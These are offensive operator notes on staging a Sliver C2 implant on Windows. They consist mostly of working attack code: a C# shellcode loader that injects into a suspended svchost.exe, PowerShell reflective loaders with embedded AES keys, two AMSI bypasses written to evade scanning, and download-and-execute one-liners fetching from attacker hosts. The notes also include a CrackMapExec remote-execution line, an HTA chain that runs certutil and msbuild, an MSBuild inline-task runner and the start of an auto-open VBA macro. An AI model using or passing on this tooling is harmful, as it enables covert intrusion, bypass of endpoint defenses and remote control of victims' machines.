Stager and Shellcodes

https://medium.com/@youcef.s.kelouaz/writing-a-sliver-c2-powershell-stager-with-shellcode-compression-and-aes-encryption-9725c0201ea8

Create implant profiles — one per target architecture. `--format shellcode` produces the raw stage that the stage listener serves, `--skip-symbols` skips symbol obfuscation to speed up the build:

profiles new -b https://10.10.15.207:443 --skip-symbols --format shellcode --arch amd64 local

profiles new -b https://10.0.0.241:443 --skip-symbols --format shellcode --arch x86 local_x86

Creating a certificate for the listener by cloning www.google.com's (Metasploit's impersonate_ssl). The result is self-signed, so clients will not trust it — which is why the loader below disables certificate validation.

use auxiliary/gather/impersonate_ssl
set RHOST www.google.com
run
sudo cp /root/.msf4/loot/20240210195945_default_172.217.1.4_172.217.1.4_key_007914.key .

sudo cp /root/.msf4/loot/20240210195945_default_172.217.1.4_172.217.1.4_cert_725923.crt .


sudo cp /root/.msf4/loot/20240210195945_default_172.217.1.4_172.217.1.4_pem_052506.pem .
  • Rename the copied files to crt.crt and key.key; the listener commands below reference those names.

Starting the HTTPS C2 listener (the implant's callback channel; its address and port must match the profile's -b value — the IPs in these notes differ from section to section)

https -L 192.168.45.195 -l 443 -c /home/jay/sliver/crt.crt -k /home/jay/sliver/key.key

Starting the stage listener(s) — one per profile, both if both architectures are needed. It serves the stage compressed with -C deflate9 and AES-encrypted with the given key/IV; the loader must be given the same algorithm name and the raw bytes of the same key/IV.

stage-listener --url https://10.10.15.207:8443 --profile local -c /home/jay/sliver/crt.crt -k /home/jay/sliver/key.key -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
stage-listener --url https://10.0.0.241:8443 --profile local_x86 -c /home/jay/sliver/crt.crt -k /home/jay/sliver/key.key -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV

Shellcode runner (C# class library; the PowerShell script further below loads it reflectively and calls DownloadAndExecute)

using System;  
using System.Collections.Generic;  
using System.IO;  
using System.Linq;  
using System.Net;  
using System.Runtime.InteropServices;  
using System.Security.Cryptography;  
using System.Text;  
using System.IO.Compression;  
namespace Sl1verLoader  
{  
public class Program  
{  
// NOTE(review): these two fields are never read. DownloadAndExecute and Decrypt both take
// byte[] parameters of the same names, which shadow them; they can be deleted.
private static string AESKey;
private static string AESIV;
  
/// <summary>
/// Managed mirror of the Win32 SECURITY_ATTRIBUTES structure. CreateProcessA accepts one for
/// the process and one for the thread; this loader passes null for both.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public class SecurityAttributes
{
    // nLength: the structure size, which Win32 expects the caller to fill in.
    public Int32 Length;
    // lpSecurityDescriptor: NULL selects the default security descriptor.
    public IntPtr lpSecurityDescriptor;
    // bInheritHandle: marshalled as a 4-byte BOOL, matching the native layout.
    public bool bInheritHandle;

    public SecurityAttributes()
    {
        lpSecurityDescriptor = IntPtr.Zero;
        bInheritHandle = false;
        Length = Marshal.SizeOf(typeof(SecurityAttributes));
    }
}
/// <summary>
/// Managed mirror of PROCESS_INFORMATION, filled in by CreateProcessA.
/// hProcess and hThread are kernel handles; this file imports no CloseHandle, so they are never closed.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public struct ProcessInformation
{
public IntPtr hProcess;
public IntPtr hThread;
public Int32 dwProcessId;
public Int32 dwThreadId;
}
/// <summary>
/// dwCreationFlags values for CreateProcess (Win32 CREATE_* / priority-class constants).
/// Only CREATE_SUSPENDED is used by this loader: the host process is created with its main
/// thread suspended so nothing of it runs before the injected thread is started.
/// </summary>
[Flags]
public enum CreateProcessFlags : uint
{
DEBUG_PROCESS = 0x00000001,
DEBUG_ONLY_THIS_PROCESS = 0x00000002,
// used by DownloadAndExecute
CREATE_SUSPENDED = 0x00000004,
DETACHED_PROCESS = 0x00000008,
CREATE_NEW_CONSOLE = 0x00000010,
NORMAL_PRIORITY_CLASS = 0x00000020,
IDLE_PRIORITY_CLASS = 0x00000040,
HIGH_PRIORITY_CLASS = 0x00000080,
REALTIME_PRIORITY_CLASS = 0x00000100,
CREATE_NEW_PROCESS_GROUP = 0x00000200,
CREATE_UNICODE_ENVIRONMENT = 0x00000400,
CREATE_SEPARATE_WOW_VDM = 0x00000800,
CREATE_SHARED_WOW_VDM = 0x00001000,
CREATE_FORCEDOS = 0x00002000,
BELOW_NORMAL_PRIORITY_CLASS = 0x00004000,
ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000,
INHERIT_PARENT_AFFINITY = 0x00010000,
INHERIT_CALLER_PRIORITY = 0x00020000,
CREATE_PROTECTED_PROCESS = 0x00040000,
EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000,
PROCESS_MODE_BACKGROUND_END = 0x00200000,
CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
CREATE_DEFAULT_ERROR_MODE = 0x04000000,
CREATE_NO_WINDOW = 0x08000000,
PROFILE_USER = 0x10000000,
PROFILE_KERNEL = 0x20000000,
PROFILE_SERVER = 0x40000000,
CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000,
}
  
  
/// <summary>
/// Managed mirror of the Win32 STARTUPINFO(A) structure handed to CreateProcessA.
/// Only cb (the structure size) is set; every other member stays at its zero default, and
/// with dwFlags = 0 CreateProcess ignores the remaining members.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
public class StartupInfo
{
    public Int32 cb;
    public IntPtr lpReserved;
    public IntPtr lpDesktop;
    public IntPtr lpTitle;
    public Int32 dwX;
    public Int32 dwY;
    public Int32 dwXSize;
    public Int32 dwYSize;
    public Int32 dwXCountChars;
    public Int32 dwYCountChars;
    public Int32 dwFillAttribute;
    public Int32 dwFlags;
    // WORD-sized members; keeping them Int16 preserves the native layout.
    public Int16 wShowWindow;
    public Int16 cbReserved2;
    public IntPtr lpReserved2;
    public IntPtr hStdInput;
    public IntPtr hStdOutput;
    public IntPtr hStdError;

    public StartupInfo()
    {
        cb = Marshal.SizeOf(typeof(StartupInfo));
    }
}
// P/Invoke surface. None of these declare SetLastError = true, so Marshal.GetLastWin32Error()
// is not reliable after a failure; callers only get "zero / false means it failed". No CloseHandle
// (or ResumeThread) is imported, so every handle obtained through these calls is leaked and the
// host process's main thread is never resumed.

// Native return type is BOOL; declared as IntPtr here, so treat IntPtr.Zero as failure.
// String parameters marshal as ANSI (the CharSet default), which matches the A-suffixed API.
[DllImport("kernel32.dll")]
public static extern IntPtr CreateProcessA(String lpApplicationName, String lpCommandLine, SecurityAttributes lpProcessAttributes, SecurityAttributes lpThreadAttributes, Boolean bInheritHandles, CreateProcessFlags dwCreationFlags,
IntPtr lpEnvironment,
String lpCurrentDirectory,
[In] StartupInfo lpStartupInfo,
out ProcessInformation lpProcessInformation

);

// dwSize is declared Int32 (natively SIZE_T); adequate for shellcode-sized buffers.
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);

// The last parameter is natively an optional SIZE_T*. Declared as int, an int 0 is passed where
// the pointer is expected, i.e. NULL: the byte count is simply not reported back.
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] buffer, IntPtr dwSize, int lpNumberOfBytesWritten);

// lpThreadId is natively an optional LPDWORD; IntPtr.Zero means "don't report it".
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);


// RWX is the simplest protection for an injected buffer and the one most commonly flagged by
// memory scanners. MEM_COMMIT without MEM_RESERVE is accepted because lpAddress is NULL
// (the system picks and reserves the region itself).
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
private static UInt32 MEM_COMMIT = 0x1000;
  
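/// <summary>
/// Fetches the stage from <paramref name="url"/>, optionally AES-decrypts and decompresses it,
/// then injects it into a freshly created, suspended copy of <paramref name="TargetBinary"/>
/// (resolved under the system directory) and starts a remote thread on it.
/// </summary>
/// <param name="url">Stage listener URL. TLS certificate validation is disabled for this request (see below).</param>
/// <param name="TargetBinary">File name of the host process under C:\Windows\System32, e.g. "svchost.exe".</param>
/// <param name="CompressionAlgorithm">"deflate9", "gzip", or empty/other for no decompression (see <see cref="Decompress"/>).</param>
/// <param name="AESKey">Raw key bytes; null (together with AESIV) for an unencrypted stage.</param>
/// <param name="AESIV">Raw 16-byte IV; only used when <paramref name="AESKey"/> is also non-null.</param>
/// <exception cref="InvalidOperationException">The stage is too short or empty, or a Win32 call failed.</exception>
public static void DownloadAndExecute(string url, string TargetBinary, string CompressionAlgorithm, byte[] AESKey, byte[] AESIV)
{
    // The stage listener presents a self-signed (cloned) certificate, so chain validation must be
    // switched off. This is process-wide, and it also means TLS does not authenticate the stage:
    // an on-path party can serve a different payload. Only the AES layer (unauthenticated CBC,
    // see Decrypt) stands in the way of that.
    ServicePointManager.ServerCertificateValidationCallback += (sender, certificate, chain, sslPolicyErrors) => true;

    byte[] encrypted;
    using (WebClient client = new WebClientWithTimeout())
    {
        encrypted = client.DownloadData(url);
    }

    byte[] compressed;
    if (AESKey != null && AESIV != null)
    {
        // The first 16 bytes of the response are skipped (the stage listener prepends an IV);
        // the IV actually used for decryption is the one passed in.
        const int IvLength = 16;
        if (encrypted.Length < IvLength)
        {
            throw new InvalidOperationException("Downloaded stage is shorter than the 16-byte IV prefix.");
        }
        byte[] ciphertext = new byte[encrypted.Length - IvLength];
        Array.Copy(encrypted, IvLength, ciphertext, 0, ciphertext.Length);
        compressed = Decrypt(ciphertext, AESKey, AESIV);
    }
    else
    {
        compressed = encrypted;
    }

    byte[] shellcode = Decompress(compressed, CompressionAlgorithm);
    if (shellcode == null || shellcode.Length == 0)
    {
        // Previously this fell through to a zero-sized VirtualAllocEx, which fails silently.
        throw new InvalidOperationException("Stage is empty after decryption/decompression.");
    }

    // Spawn the host suspended so nothing of it runs before the injected thread is created.
    // Note: its main thread is never resumed (no ResumeThread is imported).
    StartupInfo startupInfo = new StartupInfo();
    ProcessInformation processInfo;
    string hostPath = Path.Combine(Environment.SystemDirectory, TargetBinary);
    IntPtr created = CreateProcessA(hostPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, startupInfo, out processInfo);
    if (created == IntPtr.Zero || processInfo.hProcess == IntPtr.Zero)
    {
        throw new InvalidOperationException("CreateProcessA failed for " + hostPath);
    }

    // RWX allocation: simplest, but also the protection memory scanners most commonly key on.
    IntPtr remoteBuffer = VirtualAllocEx(processInfo.hProcess, IntPtr.Zero, shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (remoteBuffer == IntPtr.Zero)
    {
        throw new InvalidOperationException("VirtualAllocEx failed in the target process.");
    }

    // Last argument is the optional bytes-written pointer; 0 means NULL (not reported).
    if (!WriteProcessMemory(processInfo.hProcess, remoteBuffer, shellcode, new IntPtr(shellcode.Length), 0))
    {
        throw new InvalidOperationException("WriteProcessMemory failed.");
    }

    IntPtr remoteThread = CreateRemoteThread(processInfo.hProcess, IntPtr.Zero, 0, remoteBuffer, IntPtr.Zero, 0, IntPtr.Zero);
    if (remoteThread == IntPtr.Zero)
    {
        throw new InvalidOperationException("CreateRemoteThread failed.");
    }
    // NOTE(review): hProcess, hThread and remoteThread are leaked; CloseHandle is not imported in this file.
}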
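/// <summary>
/// Inflates the stage according to <paramref name="CompressionAlgorithm"/>.
/// </summary>
/// <param name="data">Compressed (or raw) stage bytes.</param>
/// <param name="CompressionAlgorithm">"deflate9" (handled with DeflateStream, i.e. raw DEFLATE without a
/// zlib/gzip header), "gzip", or anything else — including null and "" — to return
/// <paramref name="data"/> unchanged. Names are matched case-insensitively.</param>
/// <returns>The decompressed bytes, or the input array itself when no algorithm matched.</returns>
/// <exception cref="ArgumentNullException"><paramref name="data"/> is null and an algorithm was selected.</exception>
public static byte[] Decompress(byte[] data, string CompressionAlgorithm)
{
    if (string.Equals(CompressionAlgorithm, "deflate9", StringComparison.OrdinalIgnoreCase))
    {
        return Inflate(data, input => new DeflateStream(input, CompressionMode.Decompress));
    }
    if (string.Equals(CompressionAlgorithm, "gzip", StringComparison.OrdinalIgnoreCase))
    {
        return Inflate(data, input => new GZipStream(input, CompressionMode.Decompress));
    }
    // Unknown names pass the bytes through untouched (the original contract, relied on for
    // "no decompression"). A typo here therefore shows up as garbage shellcode, not as an error.
    return data;
}

// Runs `data` through the decompressor that `open` wraps around it and collects the output.
private static byte[] Inflate(byte[] data, Func<Stream, Stream> open)
{
    if (data == null)
    {
        throw new ArgumentNullException("data");
    }
    using (MemoryStream input = new MemoryStream(data))
    using (Stream decompressor = open(input))
    using (MemoryStream output = new MemoryStream())
    {
        decompressor.CopyTo(output);
        return output.ToArray();
    }
}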
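/// <summary>
/// AES-CBC decrypts <paramref name="ciphertext"/> without removing padding.
/// </summary>
/// <param name="ciphertext">Whole blocks only: the length must be a multiple of 16.</param>
/// <param name="AESKey">16, 24 or 32 raw key bytes (the stage-listener example uses 32, i.e. AES-256).</param>
/// <param name="AESIV">16 raw IV bytes.</param>
/// <returns>The decrypted bytes, same length as the input. With PaddingMode.None any padding the
/// producer appended stays in the output, so the next stage (decompression) has to tolerate it.</returns>
/// <exception cref="ArgumentNullException">Any argument is null.</exception>
/// <exception cref="ArgumentException">The ciphertext length is not a multiple of the block size.</exception>
/// <exception cref="CryptographicException">The key or IV has an invalid length.</exception>
/// <remarks>CBC with no MAC does not authenticate the stage: tampered ciphertext decrypts without error.</remarks>
public static byte[] Decrypt(byte[] ciphertext, byte[] AESKey, byte[] AESIV)
{
    if (ciphertext == null) throw new ArgumentNullException("ciphertext");
    if (AESKey == null) throw new ArgumentNullException("AESKey");
    if (AESIV == null) throw new ArgumentNullException("AESIV");

    using (Aes aes = Aes.Create())
    {
        aes.Mode = CipherMode.CBC;        // Aes.Create()'s default, made explicit
        aes.Padding = PaddingMode.None;   // padding (if any) is left in the output
        aes.Key = AESKey;
        aes.IV = AESIV;

        // With PaddingMode.None a partial trailing block is not transformed at all; previously it
        // was silently returned as ciphertext. Reject it up front with a message naming the cause.
        int blockBytes = aes.BlockSize / 8;
        if (ciphertext.Length % blockBytes != 0)
        {
            throw new ArgumentException("Ciphertext length must be a multiple of " + blockBytes + " bytes.", "ciphertext");
        }

        // Decrypt into a separate, growable stream and flush the final block, instead of writing
        // the plaintext back over the MemoryStream that wraps the ciphertext.
        using (ICryptoTransform decryptor = aes.CreateDecryptor(aes.Key, aes.IV))
        using (MemoryStream plaintext = new MemoryStream(ciphertext.Length))
        {
            using (CryptoStream cryptoStream = new CryptoStream(plaintext, decryptor, CryptoStreamMode.Write))
            {
                cryptoStream.Write(ciphertext, 0, ciphertext.Length);
                cryptoStream.FlushFinalBlock();
            }
            // ToArray is valid on a closed MemoryStream.
            return plaintext.ToArray();
        }
    }
}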
/// <summary>
/// WebClient whose requests wait 50,000,000 ms (about 13.9 hours) instead of the default
/// 100,000 ms, so a slow stage listener does not abort the download.
/// </summary>
public class WebClientWithTimeout : WebClient
{
    protected override WebRequest GetWebRequest(Uri address)
    {
        WebRequest request = base.GetWebRequest(address);
        request.Timeout = 50000000; // milliseconds
        return request;
    }
}
}  
}

How to build the DLL

  1. Open Visual Studio (the "Class Library (.NET Framework)" template is a Visual Studio project type)
  2. Create a new Project
  3. Select Class Library (.Net Framework)
  4. paste the code
  5. Build (set the platform target to match the profile you will stage — x64 for `local`, x86 for `local_x86`; see the x86 section below)

Writing the Powershell Shellcode Runner

  • First copy the raw bytes of the assembly; the PowerShell command below copies them, as one decimal value per line, to the clipboard. `-Encoding byte` exists only in Windows PowerShell 5.1 — on PowerShell 7 use `-AsByteStream` instead:
get-content -Encoding byte -path .\ClassLibrary1.dll | clip
 get-content -Encoding byte -path .\ClassLibrary1_x86.dll | clip

Paste the clipboard contents into CyberChef with a two-step recipe: "From Decimal" (the command above emits one decimal byte value per line) followed by "To Base64". Alternatively skip CyberChef and produce the string directly: `[Convert]::ToBase64String([IO.File]::ReadAllBytes('.\ClassLibrary1.dll')) | clip`

Copy the base64 string and paste it on this template script:

# Template for the PowerShell loader: reflectively loads the Sl1verLoader DLL and calls
# DownloadAndExecute. Fill in every blank before use — PowerShell will not parse an assignment
# with nothing after the '='.
# $encodeStr is the base64 of the compiled class library ("TVqQ..." is the base64 of an MZ header).
$encodeStr = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...etc"

$decodeStr = [System.Convert]::FromBase64String($encodeStr)
# Assembly.Load from a byte[] keeps the DLL off disk. Its return value is not captured, so
# PowerShell prints the assembly object (harmless, but noisy).
[System.Reflection.Assembly]::Load($decodeStr)
$url = #stage listener url, e.g. "https://<stage-listener-ip>:8443/test.woff"
$TargetBinary = #the binary (under C:\Windows\System32) to spawn suspended and inject the shellcode into (svchost.exe as an example)
[byte[]]$AESKey =   # raw bytes of the string given to stage-listener --aes-encrypt-key (32 bytes -> AES-256); $null for an unencrypted stage
[byte[]]$AESIV =    # raw bytes of the string given to --aes-encrypt-iv (16 bytes); $null for an unencrypted stage


$CompressionAlgorithm = "deflate9" # gzip, leave empty for no decompression; must match the listener's -C
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)#launch the method

The key and IV must be passed as raw bytes. They are simply the ASCII encoding of the strings given to `--aes-encrypt-key` / `--aes-encrypt-iv` (32 bytes → AES-256 key, 16 bytes → one AES block), so convert them in CyberChef or directly in PowerShell: `([Text.Encoding]::ASCII.GetBytes('D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT') | ForEach-Object { '0x{0:x2}' -f $_ }) -join ','`

Use exactly the key/IV strings from the stage-listener command above. A mismatch decrypts to garbage rather than failing — the AES layer has no integrity check, so the error only surfaces at decompression or injection.

Final shellcode runner (x64). The addresses in these notes vary (10.10.15.207, 192.168.45.195, 192.168.45.157) — substitute the stage listener's actual URL.

# Final loader (x64). Saved as SliverPhollow.txt: the bypass script below fetches it by that name.

# 1) load the Sl1verLoader assembly straight from its base64 (never touches disk)
$assemblyB64 = "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"

$assemblyBytes = [Convert]::FromBase64String($assemblyB64)
[Reflection.Assembly]::Load($assemblyBytes)

# 2) stage listener and host process. Key/IV are the ASCII bytes of the strings given to
#    stage-listener --aes-encrypt-key / --aes-encrypt-iv; they travel in clear inside this file.
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
$url = "https://192.168.45.157:8443/test.woff"
$TargetBinary = "svchost.exe"
$CompressionAlgorithm = "deflate9"   # must match the listener's -C

# 3) download, decrypt, inflate and inject into a suspended svchost.exe
[Sl1verLoader.Program]::DownloadAndExecute($url, $TargetBinary, $CompressionAlgorithm, $AESKey, $AESIV)
  • Save it as SliverPhollow.txt — the bypass script below downloads it under exactly that name.

AMSI bypass script (save as am.txt; the later one-liners fetch it by that name). It patches the scan function in the current PowerShell process, then downloads and runs SliverPhollow.txt:

# Patches the scan export in the current process so later script content is no longer inspected,
# then hands off to the loader. Save as am.txt.
# The DLL name and the export name are spelled as byte arrays on purpose: the plain strings never
# appear in the script text, which is exactly what gets scanned — do not "document" them in clear.
$Win32 = @"
using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $Win32

# resolve the export to patch
$dllNameBytes = [Byte[]](0x61, 0x6d, 0x73, 0x69, 0x2e, 0x64, 0x6c, 0x6c)
$hModule = [Win32]::LoadLibrary([Text.Encoding]::ASCII.GetString($dllNameBytes))
$exportBytes = [Byte[]](0x41, 0x6d, 0x73, 0x69, 0x53, 0x63, 0x61, 0x6e, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72)
$target = [Win32]::GetProcAddress($hModule, [Text.Encoding]::ASCII.GetString($exportBytes))

# make the page writable. dwSize is 5 although the patch is 13 bytes; protection changes apply per
# page, so this works as long as the patch does not straddle a page boundary — pass $Patch.Length
# to be exact. The bool result is left on the pipeline (prints True/False).
$oldProtect = 0
[Win32]::VirtualProtect($target, [uint32]5, 0x40, [ref]$oldProtect)

# 13-byte stub: xor eax,eax / add eax,0x7f190178 / add eax,0xedfedf / ret
# 0x7f190178 + 0x00edfedf = 0x80070057 (E_INVALIDARG), split across two adds so the literal
# value is not in the script. The scan call now reports failure instead of a detection.
$Patch = [Byte[]](0x31, 0xC0, 0x05, 0x78, 0x01, 0x19, 0x7F, 0x05, 0xDF, 0xFE, 0xED, 0x00, 0xC3)
[Runtime.InteropServices.Marshal]::Copy($Patch, 0, $target, $Patch.Length)

# fetch and run the loader. Plain HTTP: the script and the key bytes it embeds cross the wire in clear.
# NOTE(review): this host (10.15.15.207) differs from the 10.10.15.207 used in the listener commands — verify.
(New-Object System.Net.WebClient).DownloadString('http://10.15.15.207:80/SliverPhollow.txt') | IEX

  • The last line fetches SliverPhollow.txt from the HTTP server and runs it; that script is what contacts the stage listener. It is plain HTTP, so the loader and the AES key it embeds are visible to anyone watching the traffic.

Host both files (am.txt and SliverPhollow.txt) from the directory in which you start the HTTP server:

python3 -m http.server 80

Execute the PowerShell one-liner on the target

This variant worked against a newer AMSI build where the byte patch above was caught. It sets PowerShell's internal "init failed" flag for AMSI through reflection, after which the engine skips scanning; the type and field names are carried as base64-encoded UTF-16 strings so they never appear in clear in the script:

 # Reflection bypass and loader in one go (used when the byte patch above is caught): flip the
 # engine's internal "init failed" flag, then fetch and run the x64 loader. The two base64 blobs are
 # the UTF-16LE type and field names — kept encoded so the script never contains them in clear.
$t = [Ref].Assembly.GetType('System.Management.Automation.' + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))
$t.GetField([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==')), 'NonPublic,Static').SetValue($null, $true)
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/SliverPhallowx64') | IEX
# Alternative entry point: fetch am.txt (the byte-patch bypass, which itself chains into the loader)
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX
# Shell-escaped one-liner form of the same download-and-IEX, for use as a remote exec argument
"powershell \"IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt')\""
# CrackMapExec over SMB with the Kerberos ccache; --amsi-bypass feeds am.txt as the bypass payload before running -X
cme smb 172.16.181.168 -u pete --use-kcache --amsi-bypass sliver/am.txt -X ls

For the initial shell, large1.ps1 (not reproduced in these notes) works as well.

It may take two or three attempts. Launch it from `powershell -ep bypass` so the execution policy does not block the downloaded script.

 # Same reflection bypass as above, split into steps. The two base64 blobs are the UTF-16LE type
 # and field names, kept encoded so they never appear in clear in the script text.
$typeName = 'System.Management.Automation.' + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA'))
$fieldName = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))
$field = [Ref].Assembly.GetType($typeName).GetField($fieldName, 'NonPublic,Static')
$field.SetValue($null, $true)
# then fetch the byte-patch bypass, which chains into the loader
(New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/am.txt') | IEX

x86 variant of the runner: the same script with the x86 DLL's base64. Run it from 32-bit PowerShell (C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe) so the System32\svchost.exe the loader spawns is redirected to the 32-bit one and matches the x86 shellcode, and point $url at the x86 stage listener (the one started with --profile local_x86).

# x86 loader: identical flow to the x64 script, with the x86 build of the DLL.
# Presumably meant to run from 32-bit PowerShell: the loader spawns C:\Windows\System32\<TargetBinary>,
# which a 32-bit process sees redirected to SysWOW64, so the host matches the x86 shellcode.
$assemblyB64 = "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"

$assemblyBytes = [Convert]::FromBase64String($assemblyB64)
[Reflection.Assembly]::Load($assemblyBytes)

# NOTE(review): the URL and key here are the same as in the x64 script, while the x86 stage listener
# above was started on a different host — adjust if the x86 profile is served elsewhere.
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
$url = "https://192.168.45.157:8443/test.woff"
$Targ<br>etBinary = "svchost.exe"
$CompressionAlgorithm = "deflate9"   # must match the listener's -C

[Sl1verLoader.Program]::DownloadAndExecute($url, $TargetBinary, $CompressionAlgorithm, $AESKey, $AESIV)
Encode the MSBuild project below for the HTA (the result is the long base64 blob the HTA echoes to disk): `base64 -w 0 sliver.xml > sliver_base64.txt`

Sliver HTA — a three-step LOLBin chain: PowerShell writes the base64 MSBuild project to disk, certutil decodes it, msbuild.exe runs it. Each step is a well-known detection point; expect EDR attention.

<html>
<head>
<!-- mshta runs the JScript below. The single Run() call writes the base64 MSBuild project with
     PowerShell, decodes it with certutil and executes it with the 64-bit msbuild.exe. The long
     token is the base64 of sliver.xml. Run() returns without waiting (no bWaitOnReturn given). -->
<script language="JScript">
var wsh = new ActiveXObject("WScript.Shell");
var rc = wsh.Run("powershell -windowstyle hidden echo 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 > c:\\windows\\temp\\enc3.txt;certutil -decode c:\\windows\\temp\\enc3.txt c:\\windows\\temp\\d.xml;C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe C:\\windows\\temp\\d.xml");
</script>
</head>
<body>
<script language="JScript">
// close the mshta window once the command has been launched
self.close();
</script>
</body>
</html>

Sliver MSBuild project (sliver.xml): an inline C# task that runs the am.txt bypass/loader chain through an in-process PowerShell runspace, so no powershell.exe is started — msbuild.exe is the host process.

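<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- Inline-task C# compiled and executed by msbuild.exe (no powershell.exe is spawned):
       C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe sliver.xml
       Based on Casey Smith's (@subTee) MSBuild inline-task technique, BSD 3-Clause. -->
  <!-- The "Hello" target runs both tasks in order. FragmentExample is the template's leftover and
       writes a line to the msbuild console; drop it if that output is unwanted. -->
  <Target Name="Hello">
    <FragmentExample />
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="FragmentExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>
      <Using Namespace="System" />
      <Using Namespace="System.IO" />
      <Code Type="Fragment" Language="cs">
        <![CDATA[
                Console.WriteLine("Hello From Fragment");
        ]]>
      </Code>
    </Task>
  </UsingTask>
  <!-- AssemblyFile points at the 32-bit Framework path; the 64-bit msbuild.exe invoked above still
       loads it, as used throughout these notes. -->
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[

            using System;
            using System.IO;
            using System.Diagnostics;
            using System.Reflection;
            using System.Runtime.InteropServices;
            //Add For PowerShell Invocation
            using System.Collections.ObjectModel;
            using System.Management.Automation;
            using System.Management.Automation.Runspaces;
            using System.Text;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;

            /// <summary>
            /// Downloads am.txt (bypass + loader chain) and runs it in an in-process PowerShell
            /// runspace hosted by msbuild.exe. Because the runspace lives in this process, the
            /// bypass in am.txt patches msbuild.exe's own copy of the scan DLL.
            /// </summary>
            public class ClassExample : Task, ITask
            {
                public override bool Execute()
                {
                    String cmd = @"(New-Object Net.WebClient).DownloadString('http://10.0.0.241/am.txt') | iex";
                    // Runspace and PowerShell are both IDisposable. The original closed the runspace
                    // but disposed neither; using-blocks release both even if Invoke() throws.
                    using (Runspace rs = RunspaceFactory.CreateRunspace())
                    using (PowerShell ps = PowerShell.Create())
                    {
                        rs.Open();
                        ps.Runspace = rs;
                        ps.AddScript(cmd);
                        ps.Invoke();
                        rs.Close();
                    }
                    // Always reports success to msbuild; a script error only surfaces if Invoke()
                    // throws a terminating error.
                    return true;
                }
            }

        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>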

Sliver VBA macro: runs mshta.exe against the hosted HTA, triggered from both Document_Open and AutoOpen

' Launches the hosted HTA through mshta.exe in a hidden window.
' Both Document_Open (document event) and AutoOpen (legacy auto-macro name) call it,
